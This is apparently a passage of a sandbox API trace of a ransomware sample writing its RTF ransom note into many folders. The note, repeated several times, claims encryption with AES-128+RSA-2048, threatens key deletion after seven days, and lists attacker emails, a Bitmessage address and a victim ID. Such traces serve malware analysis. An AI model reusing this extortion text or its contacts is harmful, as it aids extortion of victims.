INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.337] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.338] CloseHandle (hObject=0x294) returned 1 [0273.338] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0273.338] GetLastError () returned 0x2 [0273.338] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 